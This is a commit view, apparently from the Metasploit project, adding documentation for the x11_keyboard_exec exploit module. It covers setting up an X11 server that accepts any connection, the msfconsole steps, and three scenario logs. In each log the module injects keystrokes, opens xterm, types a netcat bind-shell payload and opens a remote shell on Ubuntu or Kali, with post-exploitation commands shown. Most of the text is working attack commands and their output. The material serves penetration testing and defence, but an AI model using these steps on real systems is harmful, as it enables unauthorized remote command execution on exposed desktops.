Land #8286, x11_keyboard_exec docs
William Vu
commit
ad084ae0cc
|
|
@ -0,0 +1,137 @@
|
|||
## Vulnerable Application
|
||||
|
||||
X11 (X Window System) is a graphical windowing system most common on unix/linux.
|
||||
The service can accept connections from any users when misconfigured which is done with the command `xhost +`.
|
||||
|
||||
This exploit has been verified against:
|
||||
|
||||
1. Ubuntu 14.04
|
||||
2. Ubuntu 16.04
|
||||
3. Kali via Emulation method
|
||||
|
||||
This exploit does NOT work against:
|
||||
|
||||
1. Solaris 10 Java Desktop System (alt+F2 has no effect)
|
||||
|
||||
### Emulation
|
||||
|
||||
This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0`
|
||||
|
||||
### Ubuntu 12.04, 14.04
|
||||
|
||||
1. `sudo nano /etc/lightdm/lightdm.conf`
|
||||
2. Under the `[SeatDefaults]` area, add:
|
||||
|
||||
```
|
||||
xserver-allow-tcp=true
|
||||
allow-guest=true
|
||||
```
|
||||
|
||||
3. logout or reboot
|
||||
4. Verification: ```sudo netstat -antp | grep 6000```
|
||||
|
||||
```
|
||||
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
|
||||
```
|
||||
|
||||
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install and configure X11
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/unix/x11/x11_keyboard_exec`
|
||||
4. Do: `set rhost [IPs]`
|
||||
5. Do: `set payload [payload]`
|
||||
6. Do: `exploit`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 14.04
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > run
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application"
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload
|
||||
[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400
|
||||
|
||||
id
|
||||
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
|
||||
cat /etc/*release
|
||||
DISTRIB_ID=Ubuntu
|
||||
DISTRIB_RELEASE=14.04
|
||||
DISTRIB_CODENAME=trusty
|
||||
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"
|
||||
NAME="Ubuntu"
|
||||
VERSION="14.04.5 LTS, Trusty Tahr"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 14.04.5 LTS"
|
||||
VERSION_ID="14.04"
|
||||
```
|
||||
|
||||
### Ubuntu 16.04
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26
|
||||
rhost => 192.168.2.26
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > exploit
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application"
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds...
|
||||
[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload
|
||||
[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400
|
||||
|
||||
id
|
||||
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
|
||||
cat /etc/*release
|
||||
DISTRIB_ID=Ubuntu
|
||||
DISTRIB_RELEASE=16.04
|
||||
DISTRIB_CODENAME=xenial
|
||||
DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS"
|
||||
NAME="Ubuntu"
|
||||
VERSION="16.04.1 LTS (Xenial Xerus)"
|
||||
ID=ubuntu
|
||||
ID_LIKE=debian
|
||||
PRETTY_NAME="Ubuntu 16.04.1 LTS"
|
||||
VERSION_ID="16.04"
|
||||
UBUNTU_CODENAME=xenial
|
||||
```
|
||||
|
||||
### Kali via Emulation
|
||||
|
||||
```
|
||||
msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat
|
||||
payload => cmd/unix/bind_netcat
|
||||
msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1
|
||||
rhost => 127.0.0.1
|
||||
msf exploit(x11_keyboard_exec) > run
|
||||
|
||||
[*] Started bind handler
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application"
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds...
|
||||
[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload
|
||||
[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400
|
||||
```
|
||||
Loading…
Reference in New Issue